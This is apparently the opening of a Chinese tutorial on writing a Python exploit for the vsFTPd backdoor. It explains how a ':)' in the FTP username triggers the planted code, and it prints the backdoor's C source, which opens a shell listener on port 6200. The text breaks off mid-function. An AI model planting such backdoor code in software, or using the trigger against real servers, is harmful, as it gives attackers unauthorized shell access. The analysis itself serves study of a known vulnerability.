大家好,首先来个声明本文目的不在于分析vsFTPd后门漏洞,我最近喜欢用漏洞编写exploit的形式来练习编程语言,在本文中,我们将重新用Python语言来一步步的编写这个漏洞的利用程序,主要是触发后门然后连接shell。首先我们来了解一下这个漏洞是如何触发的。
0×02 剖析vsFTPd后门漏洞
这个漏洞比较老了,但是要当成一个例子来练习技术,非常的经典,洞如其名,不知道这个是不是程序员故意留下的,还是被黑客植入的。首先我们下载源码下来看看。
在str.c源码中,我们发现多了一行很可疑的代码:
else if((p_str->p_buf[i]==0x3a) && (p_str->p_buf[i+1]==0x29))
{
vsf_sysutil_extra();
}
0x3a和0×29是16进制编码,我们转换成10进制再转换成字符就是 : 和 ) 。从上面的代码中很容易看出,只要我们输入的用户名字符串中有一位字符是 : ,下一位字符是 ) 就可以执行函数vsf_sysutil_extra() 。
在sysdeputil.c的源码中,我们找到了 vsf_sysutil_extra() 函数:
int vsf_sysutil_extra(void)
{
int fd, rfd;
struct sockaddr_in sa;
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
exit(1);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6200);
sa.sin_addr.s_addr = INADDR_ANY;
if((bind(fd,(struct sockaddr *)&sa,
sizeof(struct sockaddr))) < 0)&nbs